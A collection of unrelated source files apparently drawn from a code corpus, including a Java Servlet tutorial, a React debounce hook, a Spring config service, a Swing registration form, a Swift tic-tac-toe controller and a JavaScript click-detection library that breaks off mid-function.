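import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical servlet that echoes a few pieces of request data.
public class RequestInfoServlet extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        response.setContentType("text/plain;charset=utf-8");
        Cookie[] cookies = request.getCookies();            // null if the client sent no cookies
        String userAgent = request.getHeader("User-Agent"); // a request header
        String name = request.getParameter("name");         // a query/form parameter
        Object note = request.getAttribute("note");         // set earlier by a filter or servlet, else null
        response.getWriter().println("cookies: " + (cookies == null ? 0 : cookies.length));
        response.getWriter().println("User-Agent: " + userAgent);
        response.getWriter().println("name: " + name);
        response.getWriter().println("note: " + note);
    }
}
```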
Beyond that, a Servlet plays two roles in a Java web application: **a page role and a controller role**.
With dynamic page technologies such as JSP, the Servlet leans toward the controller role; jsp + servlet + model forms the basic three-layer architecture.
- (1) The page role
```
protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    request.setCharacterEncoding("UTF-8");
    response.setContentType("text/html;charset=utf-8");
    PrintWriter out = response.getWriter();
    out.println("Hello!Servlet.");
}
```
- (2) The controller role
The JSP plays the page role and the Servlet acts as the controller; together they form the basic MVC three-layer pattern, as the sketch below shows.
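A minimal sketch of the controller role (the servlet name, model data, and JSP path are hypothetical): the Servlet prepares the model and forwards to a JSP for rendering.
```java
import java.io.IOException;
import java.util.Arrays;
import java.util.List;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical controller: prepares data, then lets a JSP render it.
public class BookListController extends HttpServlet {
    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        List<String> books = Arrays.asList("Java", "JSP", "Servlet"); // stand-in for a model/DAO call
        request.setAttribute("books", books);                         // expose the model to the view
        request.getRequestDispatcher("/WEB-INF/bookList.jsp")         // choose the view
               .forward(request, response);
    }
}
```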
### **4. The Servlet Lifecycle in the Container**
The Servlet lifecycle
The Servlet lifecycle is controlled by the Servlet container and falls into three main phases: initialization, running, and destruction. The container loads the Servlet class, instantiates it, and calls init() to initialize it. When a request arrives, service() runs and dispatches to doGet or doPost according to the request; when the server decides to destroy the instance, it calls destroy() to release the resources the Servlet holds (closing database connections, file input/output streams, and so on). Over the whole lifecycle, initialization and destruction happen only once, while the number of times service() runs depends on how many times clients access the Servlet.
The figure below is a brief overview of the Servlet lifecycle.

Analysis (a code sketch follows this list):
- Step 1: the container ==loads== the Servlet class.
- Step 2: the container ==creates== (instantiates) the Servlet; the Servlet's no-argument constructor runs.
- Step 3: the ==init() method== executes (only once in the Servlet's lifetime, and before service()); it initializes the Servlet object as it is loaded.
- Step 4: ==service() executes; it is the core method for handling client requests==. An HttpServlet normally handles the two cases GET and POST; when doGet or doPost is called, the ServletRequest and ServletResponse objects are constructed and passed in as arguments.
- Step 5: ==destroy() executes and the instance is torn down== when the Servlet is stopped and unloaded; it releases the Servlet's resources. (Initialization phase, for reference: when the Servlet starts, the container reads the configuration, constructs the specified Servlet object, creates a ServletConfig object, and calls init() with that ServletConfig as its argument.)
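A minimal sketch (the log messages are illustrative) of a Servlet that overrides the lifecycle hooks described above:
```java
import java.io.IOException;
import javax.servlet.ServletConfig;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Hypothetical servlet that logs each lifecycle phase.
public class LifecycleDemoServlet extends HttpServlet {
    @Override
    public void init(ServletConfig config) throws ServletException {
        super.init(config); // keep GenericServlet's ServletConfig bookkeeping
        log("init: runs once, after construction and before any request");
    }

    @Override
    protected void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        // service() dispatched here because the request method was GET
        response.getWriter().println("handled by doGet");
    }

    @Override
    public void destroy() {
        log("destroy: runs once, when the servlet is unloaded");
    }
}
```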
### **5. Servlet Filter Configuration Has Two Parts**
- The first part is the filter definition in the web application, expressed by the `<filter>` element, which contains the two required child elements `<filter-name>` and `<filter-class>`.
- The second part is the filter-mapping definition, expressed by the `<filter-mapping>` element; a filter can be mapped to one or more Servlets or JSP files, or mapped with `url-pattern` to any URL matching a given pattern. A sketch follows below.
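The text above describes the classic web.xml `<filter>`/`<filter-mapping>` pairing. As a minimal, hedged sketch (the filter class, name, and URL pattern are made up), the same mapping can also be declared in code with the Servlet 3.0 `@WebFilter` annotation:
```java
import java.io.IOException;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.FilterConfig;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;

// Hypothetical filter: the annotation plays the role of <filter> plus <filter-mapping>,
// mapping this filter to every URL in the application.
@WebFilter(filterName = "encodingFilter", urlPatterns = "/*")
public class EncodingFilter implements Filter {
    @Override
    public void init(FilterConfig filterConfig) throws ServletException { }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        request.setCharacterEncoding("UTF-8"); // work done before the target servlet/JSP runs
        chain.doFilter(request, response);     // pass the request down the chain
    }

    @Override
    public void destroy() { }
}
```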
|
Java | UTF-8 | 138 | 1.765625 | 2 | [] | no_license |
package com.example.mindtray.memo;
public class TextContent extends MemoContent {
public TextContent(String name) {
super(name);
}
}
|
JavaScript | UTF-8 | 366 | 2.59375 | 3 | [] | no_license |
import { useEffect, useState } from 'react';
const useDebounce = (value, delay) => {
const [deValue, setDeValue] = useState(value);
useEffect(() => {
const timer = setTimeout(() => {
setDeValue(value);
}, delay);
return () => {
clearTimeout(timer);
};
}, [value, delay]);
return deValue;
};
export default useDebounce;
|
Java | UTF-8 | 2,026 | 2.015625 | 2 | [] | no_license |
package com.lab516.service.sys;
import java.io.Serializable;
import java.util.List;
import javax.persistence.Query;
import org.springframework.cache.annotation.CacheEvict;
import org.springframework.cache.annotation.Cacheable;
import org.springframework.stereotype.Service;
import org.springframework.transaction.annotation.Transactional;
import com.lab516.base.BaseService;
import com.lab516.base.Consts;
import com.lab516.base.JPAQuery;
import com.lab516.base.Page;
import com.lab516.entity.sys.Config;
@Service
public class ConfigService extends BaseService<Config> {
private final String CACHE = "configCache";
@Transactional
@CacheEvict(value = CACHE, allEntries = true)
public Config insert(Config config) {
return super.insert(config);
}
@Transactional
@CacheEvict(value = CACHE, allEntries = true)
public Config update(Config config) {
return super.update(config);
}
@Transactional
@CacheEvict(value = CACHE, allEntries = true)
public void delete(Serializable id) {
super.delete(id);
}
@Cacheable(value = CACHE)
public String findValueByName(String cfg_name) {
String hql = "from Config where cfg_name = :cfg_name";
Query query = em.createQuery(hql);
query.setParameter("cfg_name", cfg_name);
List<Config> list = query.getResultList();
return list.isEmpty() ? null : list.get(0).getCfg_value();
}
public String findApkUrl() {
return findValueByName(Consts.CFG_NAME_APK_URL);
}
public String findApkVesion() {
return findValueByName(Consts.CFG_NAME_APK_VER);
}
public String findTipMessage() {
return findValueByName(Consts.CFG_TIP_MESSAGE);
}
public Page findPage(int page_no, int page_size, String cfg_id, String cfg_name, String cfg_value) {
JPAQuery query = createJPAQuery();
query.whereNullableContains("cfg_id", cfg_id);
query.whereNullableContains("cfg_name", cfg_name);
query.whereNullableContains("cfg_value", cfg_value);
return query.getPage(page_no, page_size);
}
}
|
Markdown | UTF-8 | 809 | 2.921875 | 3 | ["MIT"] | permissive |
# plainjdbc
[](https://travis-ci.org/dohque/plainjdbc)
Small Scala library inspired by Spring JdbcTemplate to execute generated sql statements over plain jdbc.
This library has no dependencies and is extremely easy to use.
Just add PlainJDBC dependency to your build.sbt.
```
"com.dohque" %% "plainjdbc" % "0.1-SNAPSHOT"
```
And start using it.
```scala
case class Item(id: Int, name: String)
class ItemsRepository(val dataSource: DataSource) extends JdbcStore {
def findById(id: Int): Try[Option[Item]] =
query("select id, name from Items where id = ?", List(id)).map {
case head :: _ => Some(new Item(head("id"), head("name")))
case _ => None
}
}
```
Released under MIT license.
|
Java | UTF-8 | 13,173 | 2.171875 | 2 | [] | no_license |
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package talabat.clone.project;
/**
*
* @author Aya
*/
import java.awt.Color;
import java.awt.Container;
import java.awt.Font;
import java.awt.event.ActionEvent;
import java.awt.event.MouseEvent;
import java.awt.event.MouseListener;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.swing.ButtonGroup;
import javax.swing.JButton;
import javax.swing.JCheckBox;
import javax.swing.JComboBox;
import javax.swing.JFrame;
import static javax.swing.JFrame.EXIT_ON_CLOSE;
import javax.swing.JLabel;
import javax.swing.JOptionPane;
import javax.swing.JPasswordField;
import javax.swing.JRadioButton;
import javax.swing.JTextArea;
import javax.swing.JTextField;
import javax.swing.border.LineBorder;
//import static talabat.clone.Login_Coustomer.darkOrange;
/**
*
* @author Aya
*/
public class Register extends Name_X {
JLabel l6 =new JLabel (" Address: ");
JTextField Address=new JTextField();
JLabel l8 =new JLabel (" Confirm Password: ");
JPasswordField ConfirmPassword=new JPasswordField();
JLabel l7 =new JLabel (" Mobile: ");
JTextField Mobile=new JTextField();
JButton Submit=new JButton("Submit");
JButton Signin=new JButton("SIGNIN");
SubmitMouse Submitmouse=new SubmitMouse();
RestMouse restMouse =new RestMouse();
JLabel switch_to_owner=new JLabel("Switch to owner");
public static Data data=new Data();
public Register()
{
//updated 23/3/2021
Color col = new Color(255,90,0);
switch_to_owner.setForeground(col);
switch_to_owner.setBounds(165, 600, 150,100);
switch_to_owner.setFont(new java.awt.Font("Calibri", 0, 17));
switch_to_owner.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
background.add(switch_to_owner);
switch_to_owner.addMouseListener(restMouse);
background1.setBounds(-170, 0, 780, 300);
l1.setBounds(50, 320, 100, 25);
background.add(l1);
UserName.setBounds(210, 320, 180, 25);
background.add(UserName);
l2.setBounds(50, 360, 100, 25);
background.add(l2);
Password.setBounds(210, 360, 180, 25);
background.add(Password);
l8.setBounds(20, 400, 180, 25);
background.add(l8);
ConfirmPassword.setBounds(210, 400, 180, 25);
background.add(ConfirmPassword);
l6.setBounds(10, 440, 180, 25);
background.add(l6);
Address.setBounds(210, 440, 180, 25);
background.add(Address);
l7.setBounds(10, 480, 180, 25);
background.add(l7);
Mobile.setBounds(210, 480, 180, 25);
background.add(Mobile);
Submit.setBounds(40, 560, 150, 34);
background.add(Submit);
Signin.setBounds(250, 560, 150, 34);
background.add(Signin);
l6.setFont(new java.awt.Font("Calibri", 0, 18));
l6.setForeground(new java.awt.Color(255, 90, 0));
l6.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
l6.setBackground(Color.white);
l7.setFont(new java.awt.Font("Calibri", 0, 18));
l7.setForeground(new java.awt.Color(255, 90, 0));
l7.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
l7.setBackground(Color.white);
l8.setFont(new java.awt.Font("Calibri", 0, 18));
l8.setForeground(new java.awt.Color(255, 90, 0));
l8.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
l8.setBackground(Color.white);
Address.setForeground(new java.awt.Color(255, 90, 0));
Address.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
Address.setFont(new java.awt.Font("Calibri", 0, 18));
Address.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
ConfirmPassword.setForeground(new java.awt.Color(255, 90, 0));
ConfirmPassword.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
ConfirmPassword.setFont(new java.awt.Font("Calibri", 0, 18));
ConfirmPassword.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Mobile.setForeground(new java.awt.Color(255, 90, 0));
Mobile.setHorizontalAlignment(javax.swing.SwingConstants.CENTER);
Mobile.setFont(new java.awt.Font("Calibri", 0, 18));
Mobile.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Submit.setBackground(new java.awt.Color(255, 90, 0));
Submit.setForeground(Color.white);
Submit.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Submit.setFont(new java.awt.Font("Gadugi", 1, 18));
Submit.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
//Submit.addMouseListener(signMouse);
Submit.addMouseListener(Submitmouse);
Signin.setBackground(new java.awt.Color(255, 90, 0));
Signin.setForeground(Color.white);
Signin.setBorder(new javax.swing.border.LineBorder(new java.awt.Color(255, 90, 0), 1, true));
Signin.setFont(new java.awt.Font("Gadugi", 1, 18));
Signin.setCursor(new java.awt.Cursor(java.awt.Cursor.HAND_CURSOR));
Signin.addMouseListener(restMouse);
}
public class SubmitMouse implements MouseListener
{
@Override
public void mouseClicked(MouseEvent e) {
if (e.getSource()==Submit)
{
String username=UserName.getText();
String password=Password.getText();
int pass=Password.getPassword().length;
String confirmpassword=new String(ConfirmPassword.getPassword());
int confirm=ConfirmPassword.getText().length();
String address=Address.getText();
String Mobilenumber=Mobile.getText();
int mobileNumber=Mobile.getText().length();
if (username.isEmpty()||password.isEmpty()||confirmpassword.isEmpty()||address.isEmpty()||Mobilenumber.isEmpty())
{
JOptionPane.showConfirmDialog(null,"You must fill all fields completely","Error",JOptionPane.ERROR_MESSAGE);
}
else if (!Pattern.matches("[a-zA-Z]+", username))
{
JOptionPane.showConfirmDialog(null,"Tha name is Invalid","Error",JOptionPane.ERROR_MESSAGE);
UserName.setText("");
}else if (pass<6)
{
JOptionPane.showConfirmDialog(null,"Password must be greater than 6","Error",JOptionPane.ERROR_MESSAGE);
Password.setText("");
}else if (!(password.equals(confirmpassword)))
{
JOptionPane.showConfirmDialog(null,"Password confitmation is wrong","Error",JOptionPane.ERROR_MESSAGE);
Password.setText("");
ConfirmPassword.setText("");
}else if (!(mobileNumber==11))
{
JOptionPane.showConfirmDialog(null,"Mobile Number must contain 11 numbers","Error",JOptionPane.ERROR_MESSAGE);
Mobile.setText("");
}
else if(!Pattern.matches("^[0-9]+$", Mobilenumber))
{
JOptionPane.showConfirmDialog(null,"Mobile Number must contain numbers only","Error",JOptionPane.ERROR_MESSAGE);
Mobile.setText("");
}
else
{
//Data.data.numberOfUsers++;
/*Data.data.user_name[Data.data.numberOfUsers]=username;
Data.data.user_password[Data.data.numberOfUsers]=password;
Data.data.user_address[Data.data.numberOfUsers]=address;
Data.data.user_mobile_number[Data.data.numberOfUsers]=Mobilenumber;*/
checkData(address, username, Mobilenumber, password);
//restaurants_page obj=new restaurants_page();
Submit.setForeground(new Color(255,90,0));
Submit.setBackground(Color.white);
Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
}
@Override
public void mousePressed(MouseEvent e) {
}
@Override
public void mouseReleased(MouseEvent e) {
}
@Override
public void mouseEntered(MouseEvent e) {
if(e.getSource()==Submit)
{
Submit.setForeground(new Color(255,90,0));
Submit.setBackground(Color.white);
Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
@Override
public void mouseExited(MouseEvent e) {
if(e.getSource()==Submit)
{
Submit.setBackground(new Color(255,90,0));
Submit.setForeground(Color.white);
Submit.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
}
public class RestMouse implements MouseListener
{
@Override
public void mouseClicked(MouseEvent e) {
if(e.getSource()==switch_to_owner)
{
LogIn_Owner2 o=new LogIn_Owner2();
dispose();
}
if (e.getSource()==Signin)
{
Login_Coustomer o=new Login_Coustomer();
dispose();
/*UserName.setText("");
Password.setText("");
ConfirmPassword.setText("");
Address.setText("");
Mobile.setText("");*/
}
}
@Override
public void mousePressed(MouseEvent e) {
}
@Override
public void mouseReleased(MouseEvent e) {
}
@Override
public void mouseEntered(MouseEvent e) {
if(e.getSource()==Signin)
{
Signin.setForeground(new Color(255,90,0));
Signin.setBackground(Color.white);
Signin.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
@Override
public void mouseExited(MouseEvent e) {
if(e.getSource()==Signin)
{
Signin.setBackground(new Color(255,90,0));
Signin.setForeground(Color.white);
Signin.setBorder(new LineBorder(new Color(255,90,0),1,true));
}
}
}
public void checkData(String address,String UserName,String mobile,String pass)
{
boolean flag=false;
for (int i = 0; i <= Data.data.numberOfUsers; i++) {
if (UserName.equals(Data.data.user_name[i])&&address.equals(Data.data.user_address[i])&&mobile.equals(Data.data.user_mobile_number[i]))
{
JOptionPane.showConfirmDialog(null,"This account is already exist","Error",JOptionPane.ERROR_MESSAGE);
flag=false;
break;
}
else if (UserName.equals(Data.data.user_name[i]))
{
JOptionPane.showConfirmDialog(null,"User name already exist","Error",JOptionPane.ERROR_MESSAGE);
flag=false;
break;
}
else if (mobile.equals(Data.data.user_mobile_number[i]))
{
JOptionPane.showConfirmDialog(null,"Mobile number already exist","Error",JOptionPane.ERROR_MESSAGE);
flag=false;
break;
}
else if(!(UserName.equals(Data.data.user_name[i]))&&!(address.equals(Data.data.user_address[i]))&&!(mobile.equals(Data.data.user_mobile_number[i])))
{
flag=true;
}
}
if(flag==true)
{
JOptionPane.showConfirmDialog(null,"Successfully registered. ","Error",JOptionPane.ERROR_MESSAGE);
saveData(UserName,pass,address,mobile);
Login_Coustomer y=new Login_Coustomer();
dispose();
}
}
public void saveData(String name,String pass,String Address,String Mobile)
{
Data.data.numberOfUsers++;
Data.data.user_name[Data.data.numberOfUsers]=name;
Data.data.user_password[Data.data.numberOfUsers]=pass;
Data.data.user_address[Data.data.numberOfUsers]=Address;
Data.data.user_mobile_number[Data.data.numberOfUsers]=Mobile;
}
}
|
C# | UTF-8 | 2,584 | 2.640625 | 3 | [] | no_license |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Speech.Recognition;
using System.Speech.Synthesis;
using System.Speech.AudioFormat;
using System.Windows.Forms;
namespace domotica
{
public class SpeechToText
{
DictationGrammar dictation;
SpeechRecognitionEngine sr;
RichTextBox textBox;
string finalResult;
bool isCompleted = false;
public void getVoice()
{
try
{
textBox.Text = "";
dictation = new DictationGrammar();
sr = new SpeechRecognitionEngine();
sr.LoadGrammar(dictation);
sr.SetInputToDefaultAudioDevice();
sr.RecognizeAsync(RecognizeMode.Multiple);
//sr.SpeechHypothesized -= new EventHandler<SpeechHypothesizedEventArgs>(SpeechHypothesizing);
sr.SpeechRecognized -= new EventHandler<SpeechRecognizedEventArgs>(SpeechRecognized);
sr.EmulateRecognizeCompleted -= new EventHandler<EmulateRecognizeCompletedEventArgs>(EmulateRecognizeCompletedHandler);
//sr.SpeechHypothesized += new EventHandler<SpeechHypothesizedEventArgs>(SpeechHypothesizing);
sr.SpeechRecognized += new EventHandler<SpeechRecognizedEventArgs>(SpeechRecognized);
sr.EmulateRecognizeCompleted += new EventHandler<EmulateRecognizeCompletedEventArgs>(EmulateRecognizeCompletedHandler);
}
catch
{
}
}
public void SpeechRecognized(object sender, SpeechRecognizedEventArgs e)
{
try
{
finalResult = e.Result.Text;
textBox.Text += " " + finalResult;
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
private void EmulateRecognizeCompletedHandler(object sender, EmulateRecognizeCompletedEventArgs e)
{
try
{
isCompleted = true;
sr.UnloadGrammar(dictation);
sr.RecognizeAsyncStop();
textBox.Text += "\n\nCompleted. \n";
MessageBox.Show("Completed. ");
}
catch (Exception ex)
{
MessageBox.Show(ex.Message);
}
}
public SpeechToText( RichTextBox aTextBox )
{
textBox = aTextBox;
}
}
}
|
C# | UTF-8 | 633 | 2.6875 | 3 | [] | no_license |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace ClassLibrary1
{
public class Class1:IItf1,IItf2
{
void IItf1.Abc()
{
}
void IItf2.Abc()
{
}
private int aaa1;
}
class MyClasssub :Class1
{
private int a;
}
class MyClassSubSub : MyClasssub
{
private int c;
}
class MyClassSubSubSub : MyClassSubSub
{
private int b;
}
public interface IItf1
{
void Abc();
}
public interface IItf2
{
void Abc();
}
}
|
Java | UTF-8 | 723 | 2.34375 | 2 | [] | no_license |
package cn.com.do1.mock.util;
import cn.com.do1.mock.model.TUserInfo;
import lombok.extern.slf4j.Slf4j;
import java.util.HashMap;
import java.util.Map;
/**
* @Author huangKun
* @Date 2021/3/24
**/
@Slf4j
public class LocalCacheUtil {
public static Map<String, TUserInfo> USER_CACHE = new HashMap<>();
static RedisUtil redisUtil = new RedisUtil();
static {
log.info(">>>>>>loading static block");
USER_CACHE.put("user1", (TUserInfo)redisUtil.getByKey("user1"));
}
public TUserInfo getUserCache(String userId){
if (null == USER_CACHE){
log.info(">>>>>>static block not load");
return null;
}
return USER_CACHE.get(userId);
}
}
|
JavaScript | UTF-8 | 406 | 3.09375 | 3 | ["MIT"] | permissive |
/* Convert string to lower case.
*
* |Name |Desc |
* |------|------------------|
* |str |String to convert |
* |return|Lower cased string|
*/
/* example
* lowerCase('TEST'); // -> 'test'
*/
/* module
* env: all
*/
/* typescript
* export declare function lowerCase(str: string): string;
*/
_('toStr');
exports = function(str) {
return toStr(str).toLocaleLowerCase();
};
|
Swift | UTF-8 | 2,762 | 2.53125 | 3 | ["Apache-2.0"] | permissive |
import UIKit
import main
@objc class ViewController: UIViewController, GameEngineCallbacks {
@IBOutlet weak var titleLabel: UILabel!
@IBOutlet weak var b11: UIButton!
@IBOutlet weak var b12: UIButton!
@IBOutlet weak var b13: UIButton!
@IBOutlet weak var b21: UIButton!
@IBOutlet weak var b22: UIButton!
@IBOutlet weak var b23: UIButton!
@IBOutlet weak var b31: UIButton!
@IBOutlet weak var b32: UIButton!
@IBOutlet weak var b33: UIButton!
@IBOutlet weak var winnerLabel: UILabel!
@IBOutlet weak var newGame: UIButton!
func clearUIField() {
// buttons
let arr = [b11, b12, b13, b21, b22, b23, b31, b32, b33]
for elem in arr {
elem?.setTitle("_", for: .normal)
}
winnerLabel.text = ""
}
func showZero(i: Int32, j: Int32) {
// buttons
let arr = [[b11, b12, b13], [b21, b22, b23], [b31, b32, b33]]
arr[Int(i)][Int(j)]?.setTitle("o", for: .normal)
}
func showWinner(message: String) {
winnerLabel.text = message
}
private var engine: GameEngine?
// Lifecycle
override func viewDidLoad() {
super.viewDidLoad()
engine = GameEngine(callbacks: self)
titleLabel.text = CommonKt.createApplicationScreenMessage()
engine?.startNewGame()
}
// Actions
@IBAction func onNewGameClick(_ sender: Any) {
engine?.startNewGame()
}
@IBAction func onB11Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 0, j: 0)
}
@IBAction func onB12Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 0, j: 1)
}
@IBAction func onB13Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 0, j: 2)
}
@IBAction func onB21Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 1, j: 0)
}
@IBAction func onB22Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 1, j: 1)
}
@IBAction func onB23Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 1, j: 2)
}
@IBAction func onB31Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 2, j: 0)
}
@IBAction func onB32Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 2, j: 1)
}
@IBAction func onB33Click(_ sender: UIButton) {
sender.setTitle("x", for: .normal)
engine?.fieldPressed(i: 2, j: 2)
}
}
|
JavaScript | UTF-8 | 10,157 | 3.0625 | 3 | ["MIT"] | permissive |
/**
* Watcher for click, double-click, or long-click event for both mouse and touch
* @example
* import { clicked } from 'clicked'
*
* function handleClick()
* {
* console.log('I was clicked.')
* }
*
* const div = document.getElementById('clickme')
* const c = clicked(div, handleClick, { threshold: 15 })
*
* // change callback
* c.callback = () => console.log('different clicker')
*
* // destroy
* c.destroy()
*
* // using built-in querySelector
* clicked('#clickme', handleClick2)
*
* // watching for all types of clicks
* function handleAllClicks(e) {
* switch (e.type)
* {
* case 'clicked': ...
* case 'double-clicked': ...
* case 'long-clicked': ...
* }
*
* // view UIEvent that caused callback
* console.log(e.event)
* }
* clicked('#clickme', handleAllClicks, { doubleClicked: true, longClicked: true })
*/
var __assign = (this && this.__assign) || function () {
__assign = Object.assign || function(t) {
for (var s, i = 1, n = arguments.length; i < n; i++) {
s = arguments[i];
for (var p in s) if (Object.prototype.hasOwnProperty.call(s, p))
t[p] = s[p];
}
return t;
};
return __assign.apply(this, arguments);
};
var defaultOptions = {
threshold: 10,
clicked: true,
mouse: true,
touch: true,
doubleClicked: false,
doubleClickedTime: 300,
longClicked: false,
longClickedTime: 500,
capture: false,
clickDown: false
};
/**
* @param element element or querySelector entry (e.g., #id-name or .class-name)
* @param callback called after a click, double click, or long click is registered
* @param [options]
* @param [options.threshold=10] threshold of movement to cancel all events
* @param [options.clicked=true] dispatch event for clicked
* @param [options.mouse=true] whether to listen for mouse events; can also be used to set which mouse buttons are active
* @param [options.touch=true] whether to listen for touch events; can also be used to set the number of touch points to accept
* @param [options.doubleClicked] dispatch event for double click
* @param [options.doubleClickedTime=500] wait time in millseconds for double click
* @param [options.longClicked] dispatch event for long click
* @param [options.longClickedTime=500] wait time for long click
* @param [options.clickDown] dispatch event for click down
* @param [options.capture] events will be dispatched to this registered listener before being dispatched to any EventTarget beneath it in the DOM tree
*/
export function clicked(element, callback, options) {
return new Clicked(element, callback, options);
}
var Clicked = /** @class */ (function () {
function Clicked(element, callback, options) {
if (typeof element === 'string') {
element = document.querySelector(element);
if (!element) {
console.warn("Unknown element: document.querySelector(" + element + ") in clicked()");
return;
}
}
this.element = element;
this.callback = callback;
this.options = __assign(__assign({}, defaultOptions), options);
this.createListeners();
}
Clicked.prototype.createListeners = function () {
var _this = this;
this.events = {
mousedown: function (e) { return _this.mousedown(e); },
mouseup: function (e) { return _this.mouseup(e); },
mousemove: function (e) { return _this.mousemove(e); },
touchstart: function (e) { return _this.touchstart(e); },
touchmove: function (e) { return _this.touchmove(e); },
touchcancel: function () { return _this.cancel(); },
touchend: function (e) { return _this.touchend(e); }
};
this.element.addEventListener('mousedown', this.events.mousedown, { capture: this.options.capture });
this.element.addEventListener('mouseup', this.events.mouseup, { capture: this.options.capture });
this.element.addEventListener('mousemove', this.events.mousemove, { capture: this.options.capture });
this.element.addEventListener('touchstart', this.events.touchstart, { passive: true, capture: this.options.capture });
this.element.addEventListener('touchmove', this.events.touchmove, { passive: true, capture: this.options.capture });
this.element.addEventListener('touchcancel', this.events.touchcancel, { capture: this.options.capture });
this.element.addEventListener('touchend', this.events.touchend, { capture: this.options.capture });
};
/** removes event listeners added by Clicked */
Clicked.prototype.destroy = function () {
this.element.removeEventListener('mousedown', this.events.mousedown);
this.element.removeEventListener('mouseup', this.events.mouseup);
this.element.removeEventListener('mousemove', this.events.mousemove);
this.element.removeEventListener('touchstart', this.events.touchstart);
this.element.removeEventListener('touchmove', this.events.touchmove);
this.element.removeEventListener('touchcancel', this.events.touchcancel);
this.element.removeEventListener('touchend', this.events.touchend);
};
Clicked.prototype.touchstart = function (e) {
if (this.down === true) {
this.cancel();
}
else {
if (e.touches.length === 1) {
this.handleDown(e, e.changedTouches[0].screenX, e.changedTouches[0].screenY);
}
}
};
Clicked.prototype.pastThreshold = function (x, y) {
return Math.abs(this.lastX - x) > this.options.threshold || Math.abs(this.lastY - y) > this.options.threshold;
};
Clicked.prototype.touchmove = function (e) {
if (this.down) {
if (e.touches.length !== 1) {
this.cancel();
}
else {
var x = e.changedTouches[0].screenX;
var y = e.changedTouches[0].screenY;
if (this.pastThreshold(x, y)) {
this.cancel();
}
}
}
};
/** cancel current event */
Clicked.prototype.cancel = function () {
this.down = false;
if (this.doubleClickedTimeout) {
clearTimeout(this.doubleClickedTimeout);
this.doubleClickedTimeout = null;
}
if (this.longClickedTimeout) {
clearTimeout(this.longClickedTimeout);
this.longClickedTimeout = null;
}
};
Clicked.prototype.touchend = function (e) {
if (this.down) {
e.preventDefault();
this.handleClicks(e);
}
};
Clicked.prototype.handleClicks = function (e) {
var _this = this;
if (this.options.doubleClicked) {
this.doubleClickedTimeout = this.setTimeout(function () { return _this.doubleClickedCancel(e); }, this.options.doubleClickedTime);
}
else if (this.options.clicked) {
this.callback({ event: e, type: 'clicked' });
}
if (this.longClickedTimeout) {
clearTimeout(this.longClickedTimeout);
this.longClickedTimeout = null;
}
this.down = false;
};
Clicked.prototype.handleDown = function (e, x, y) {
var _this = this;
if (this.doubleClickedTimeout) {
if (this.pastThreshold(x, y)) {
if (this.options.clicked) {
this.callback({ event: e, type: 'clicked' });
}
this.cancel();
}
else {
this.callback({ event: e, type: 'double-clicked' });
this.cancel();
}
}
else {
this.lastX = x;
this.lastY = y;
this.down = true;
if (this.options.longClicked) {
this.longClickedTimeout = this.setTimeout(function () { return _this.longClicked(e); }, this.options.longClickedTime);
}
if (this.options.clickDown) {
this.callback({ event: e, type: 'click-down' });
}
}
};
Clicked.prototype.longClicked = function (e) {
this.longClickedTimeout = null;
this.down = false;
this.callback({ event: e, type: 'long-clicked' });
};
Clicked.prototype.doubleClickedCancel = function (e) {
this.doubleClickedTimeout = null;
if (this.options.clicked) {
this.callback({ event: e, type: 'clicked' });
}
};
Clicked.prototype.checkMouseButtons = function (e) {
if (this.options.mouse === false) {
return false;
}
else if (this.options.mouse === true) {
return true;
}
else if (e.button === 0) {
return this.options.mouse.includes('left');
}
else if (e.button === 1) {
return this.options.mouse.includes('middle');
}
else if (e.button === 2) {
return this.options.mouse.includes('right');
